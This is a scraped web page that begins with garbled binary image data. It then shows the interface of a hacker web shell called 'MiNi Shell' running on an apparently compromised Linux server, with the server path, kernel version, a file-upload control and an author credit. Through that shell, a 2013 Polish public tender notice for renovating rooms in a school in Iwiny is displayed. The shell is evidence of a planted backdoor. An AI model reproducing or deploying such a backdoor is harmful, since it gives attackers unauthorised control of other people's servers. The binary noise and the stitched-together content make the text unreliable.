JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130620/119593-N-2013.html

<p class="kh_header"><b>Iwiny: Remont pomieszczeń w Zespole Szkolno-Przedszkolnym w Iwinach</b><br>
<b>Numer ogłoszenia: 119593 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny - Szkoła Podstawowa im. Pionierów Polskiej Miedzi , Iwiny, 59-721 Iwiny, woj. dolnośląskie, tel. 075 7389383, faks 075 7389383.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja oświaty.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w Zespole Szkolno-Przedszkolnym w Iwinach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont pomieszczeń w Zespole Szkolno-Przedszkolnym w Iwinach

Przedmiot zamówienia obejmuje:
Remont pomieszczeń w Zespole Szkolno-Przedszkolnym w Iwinach
Dane ogólne
Zespół Szkolno-Przedszkolny zlokalizowany jest w miejscowości Iwiny Osiedle I, gmina Warta Bolesławiecka. Na dzień dzisiejszy szkoła jest użytkowana i wyposażona we wszystkie media, teren posesji jest zagospodarowany. Wejście główne do budynku umieszczone jest od strony drogi, tj. południowej. 
Budynek o trzech kondygnacjach, w całości podpiwniczony, wykonany w technologii tradycyjnej. Ściany budynku murowane z cegły ceramicznej, pełnej. Stropy masywne.
Przewiduje się remont korytarza na parterze budynku wraz z hollem i częścią klatek schodowych. Ponadto remont kuchni, sali S15 oraz sali G19. 
Zakres prac
W ramach remontu należy wykonać następujące prace:
1. Korytarz i holl - parter 
A. Remont posadzki o powierzchni 166,207m2- zerwanie cokolika - 98mb, przygotowanie powierzchni posadzki poprzez frezowanie lastryko, zagruntowanie posadzki, przygotowanie podłoża do ułożenia płytek GRES, ułożenie dwubarwnej posadzki z płytek GRES 30x30 cm,  wraz z wykonaniem cokolika z płytek posadzkowych - 107,50 mb. Osadzenie listew aluminiowych w progach - 12 sztuk, przygotowanie podłoża i ułożenie posadzki z płytek GRES 30x30 cm stopnice z ryfem na schodach w hollu 10,29m2

B.Remont ścian i sufitów : zeskrobanie i zmycie farby - 372,769 m2, ługowanie farby olejnej z lamperii - 159,48 m2, przygotowanie podłoża pod gładzie - 346,386 m2, przecieranie istniejących tynków na lamperii - 159,48 m2, wykonanie gładzi gipsowych na ścianach powyżej lamperii - 186,906 m2, ochrona narożników kątownikiem aluminiowym perforowanym - 30 mb, zagruntowanie i pomalowanie farbą emulsyjną  sufitów - 185,863 m2, zagruntowanie i pomalowanie farba lateksową ścian - 186,906 m2, nałożenie farby gruntującej i wykonanie wyprawy z mieszanki żywicznej na lamperii - 159,48 m2, malowanie rur instalacyjnych - 5,86m, malowanie stolarki drzwiowej - 3,36m2, wykucie z muru ościeżnic drewnianych 6 szt, demontaż skrzydeł drzwiowych - 9szt, osadzenie ościeżnic stalowych - 10 szt, montaż skrzydeł drzwiowych płycinowych wewnętrznych fabrycznie wykończonych - (jak istniejące - sala G16) - 8 szt,  montaż skrzydła drzwiowego do WC z otworami wentylacyjnymi- wzór do uzgodnienia z inwestorem - 2 szt
2. Portiernia
Rozebranie zabudowy drewnianej z naświetlami - 10,575m2, postawienie ścianki działowej gr. ? cegły - 8,848m2, ułożenie nadproży prefabrykowanych - 3 szt, montaż naświetla z PCV wym. 0,70x1,80m oraz okna PCV o wym 1,30x1,80m z rozwieranym okienkiem podawczym wym 0,65x0,60m w kolorze białym,  obsadzenie prefabrykowanych podokienników - 2 szt (parapety wewnątrz pomieszczenia wyłożone płytkami podłogowymi), wykonanie i zagruntowanie tynków wewnętrznych 17,696m2, pomalowanie farba lateksową ścian - 3,445m2, nałożenie farby gruntującej i wykonanie wyprawy z mieszanki żywicznej na lamperii - 4,11 m2

3. Klatka schodowa główna
Zerwanie istniejącego cokolika oraz wykonanie cokolika przy schodach na głównej klatce schodowej od poziomu piwnicy do poziomu I piętra - 15mb. 
Zeskrobanie i zmycie farby - 86,098 m2, ługowanie farby olejnej z lamperii - 22,29 m2, przygotowanie podłoża pod gładzie - 24,61 m2, przecieranie istniejących tynków na lamperii - 22,29 m2, wykonanie gładzi gipsowych na ścianach powyżej lamperii - 24,61 m2, zagruntowanie i pomalowanie farbą emulsyjną  sufitów - 61,488 m2, zagruntowanie i pomalowanie farba lateksową ścian - 24,61 m2, nałożenie farby gruntującej i wykonanie wyprawy z mieszanki żywicznej na lamperii - 22,29 m2.

4. Korytarz przy kuchni - parter i boczna latka schodowa z piwnicy do poziomu I piętra
A. Remont posadzki o powierzchni 26,03 m2- zerwanie cokolika - 18,29mb, przygotowanie powierzchni posadzki poprzez frezowanie lastryko, zagruntowanie posadzki, przygotowanie podłoża do ułożenia płytek GRES, ułożenie dwubarwnej posadzki z płytek GRES 30x30 cm,  wraz z wykonaniem cokolika z płytek posadzkowych -20,73 mb. Osadzenie listew aluminiowych w progach - 4 szt, przygotowanie podłoża i ułożenie posadzki z płytek GRES 30x30 cm z ryfem na schodach 16,253m2, wykonanie cokolika na schodach -25 mb.
B. Remont ścian i sufitów : zeskrobanie i zmycie farby - 83,003 m2, ługowanie farby olejnej z lamperii - 66,545 m2, gruntowanie powierzchni pod gładzie - 129,408 m2, przecieranie istniejących tynków na lamperii - 66,545 m2, wykonanie gładzi gipsowych na ścianach - 62,863 m2, ochrona narożników kątownikiem aluminiowym perforowanym - 29 mb, zagruntowanie i pomalowanie farbą emulsyjną  sufitów - 42,876 m2, zagruntowanie i pomalowanie farba lateksową ścian - 90,987 m2, nałożenie farby gruntującej i wykonanie wyprawy z mieszanki żywicznej na lamperii - 66,545 m2, malowanie stolarki drzwiowej - 11,34m2, wykucie z muru ościeżnic drewnianych 1 szt, montaż drzwi aluminiowych jednoskrzydłowych oszklonych z szybą bezpieczną dwustronnie - kolor brązowy drzwi wewnętrzne zimne - z obróbką osadzenia - 1 szt, wymiana wyczystki kominowej w ścianie z cegieł - 1 szt, wywiezienie gruzu z terenu rozbiórki -  1 m3, malowanie farbą olejną krat i balustrad z prętów- 29,125m2
5. Kuchnia
Dostawa i montaż okapu wentylacyjnego stalowego prostokątnego przyściennego ze stali nierdzewnej wym.1200x800mm, z łapaczami tłuszczu, wraz z wykonaniem przewodów wentylacyjnych z blachy stalowej, przebiciem otworu w ścianie i montażem wyrzutni z wentylatorem 230V, wykonanie podłączenia zasilania wentylatora. 
Zeskrobanie i zmycie farby, zagruntowanie tynków wewnętrznych przed malowaniem, malowanie farba emulsyjna - 61,176m2, sprawdzenie i pomiar kompletnego obwodu elektrycznego - 1 pomiar.

6. Sala S15
Remont posadzki - 39,911m2
Rozebranie posadzek z wykładzin z tworzyw sztucznych i drewnianych podłóg ślepych, przybicie płyt OSB gr.22mm, wykonanie posadzki z paneli podłogowych, kl AC5, wzór do uzgodnienia z inwestorem, montaż listew przyściennych z PCV - 25,62mb
Remont ścian i sufitu:
Odbicie tynków wewnętrznych i wykonanie tynków zwykłych kat III - 36,43m2, Dwukrotne odgrzybianie ścian - 5m2, Obsadzenie kratek wentylacyjnych w ścianach - 1 szt, Zeskrobanie i zmycie starej farby - 76,035m2, Gruntowanie podłoży przed malowaniem i malowanie farbą emulsyjną - 76,035m2, gruntowanie podłoża i malowanie lamperii farbą olejną - 38,43m2, wymiana łączników instalacyjnych podtynkowych - 1 szt, Wymiana gniazd instalacyjnych wtyczkowych - 3 szt, wymiana opraw oświetleniowych na świetlówkowe rastrowe 2x36W - 8szt, wykonanie pomiarów elektrycznych.

7. Pokój nauczycielski G19
Dwukrotne odgrzybianie ścian - 5m2, Przygotowanie powierzchni pod malowanie farbami starych tynków z poszpachlowaniem nierówności i zagruntowanie przed malowaniem - 99.746m2, Malowanie tynków wewnętrznych gładkich farbą emulsyjną dwukrotnie bez gruntowania sufity + ściany powyżej lamperii - 65.696m2, malowanie lamperii farbą olejną - 34,05m2, wymiana opraw oświetleniowych na świetlówkowe rastrowe 2x36W - 6szt, wykonanie pomiarów elektrycznych.

8. Oświetlenie korytarz i holl parter
Demontaż opraw świetlówkowych z kloszem - 21 szt, Przygotowanie podłoża pod oprawy oświetleniowe przykręcane na betonie mocowane na kołkach kotwiących - 22szt, Montaż opraw oświetleniowych przykręcanych świetlówkowych rastrowych 2x36W - 21szt, Montaż na gotowym podłożu opraw świetlówkowych z blachy stalowej z kloszem lub rastrem przykręcanych 4x18W, wym. 0,60x0,60 - (portiernia) - 1 szt, wymiana gniazd wtyczkowych podtynkowych - 2 szt, wymiana łączników instalacyjnych podtynkowych - 11szt, Przykręcanie korytek kablowych z tworzywa sztucznego  i schowanie w nich istniejących przewodów - 24mb, Wykucie bruzd dla przewodów wtynkowych w cegle - 6m, położenie przewodów - 11m, wykonanie pomiarów elektrycznych, natężenia oświetlenia.
3.2..Wszystkie elementy  zgodne z  właściwościami określonymi w opisie robót i specyfikacji technicznej wykonania i odbioru robót  oraz przedmiarem robót - załączniki do SIWZ. 
Szczegółowy opis przedmiotu zamówienia stanowią załączniki 
Przedmiar robót- załącznik nr 10 .SIWZ
Specyfikacja techniczna wykonania i odbioru robót- załącznik nr 10 SIWZ
Opis robót, przykład drzwi - załącznik nr  10 .SIWZ
Materiały użyte do realizacji zadania muszą posiadać aprobaty techniczne , odpowiadać Polskim Normom przenoszącym europejskie normy zharmonizowane - art. 30 ust.2 ustawy - prawo zamówień publicznych - stosuje się odpowiednio oraz wymogom określonym w Specyfikacji Istotnych Warunków Zamówienia.
Podstawą wykonania przedmiotu zamówienia i złożenia oferty stanowią: Opis robót z  wzorem drzwi, Specyfikacja Techniczna Wykonania i Odbioru Robót,  Przedmiar Robót, 
Oferent ma prawo do zapoznania się z miejscem realizacji przedmiotu zamówienia i dokonać wizji lokalnej przed złożeniem oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.40.00.00-1, 45.45.00.00-6, 45.31.10.00-0, 45.42.11.31-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Postępowanie prowadzone bez obowiązku wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że wykonał  w ciągu ostatnich pięciu lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej dwie roboty budowlane odpowiadające swoim rodzajem robotom będącym przedmiotem niniejszej SIWZ. w tym okresie , z podaniem wartości , przedmiotu, dat wykonania i odbiorców, na rzecz których usługi zostały wykonane lub są wykonywane , oraz  załączeniem dokumentów dotyczących najważniejszych usług. Dokumenty powinny określać czy usługi te zostały wykonane  lub są wykonywane w sposób należyty.
Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawca załączy dokumenty potwierdzające że ww roboty zostały prawidłowo ukończone i wykonane zgodnie z zasadami sztuki budowlanej.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.
Ocena spełnienia warunku udziału w postępowaniu nastąpi metodą spełnia- nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że  dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj. dysponowania osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej. Wykonawca może polegać na potencjale technicznym , osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia; Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Ocena spełnienia warunku udziału w postępowaniu nastąpi metodą spełnia- nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia;
Ocena spełnienia warunku udziału w postępowaniu nastąpi metodą spełnia- nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.zmiana umowy może nastąpić w następujących przypadkach:
a) urzędowej zmiany podatku VAT;
b) niewykonania pełnego zakresu robót;
c) szczególnie niesprzyjających warunków atmosferycznych;
d) zmian dokumentacji projektowej dokonanych na wniosek zamawiającego;
e) siły wyższej.
f)zmiana terminu realizacji przedmiotu zamówienia spowodowana okolicznościami określonymi lit. od c -e 
2. Zmiana nastąpi w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wartaboleslawiecka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny w Iwinach,Iwiny 6, 59-720 Raciborowice Górne,parter, sekretariat  w godz. urzędowania zamawiającego lub na wniosek skierowany na ww adres..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2013 godzina 10:00, miejsce: Zespól Szkolno-Przedszkolny w Iwinach, Iwiny 6, 59-720 Raciborowice Górne, parter, sekretariat,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nie będzie finansowany ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com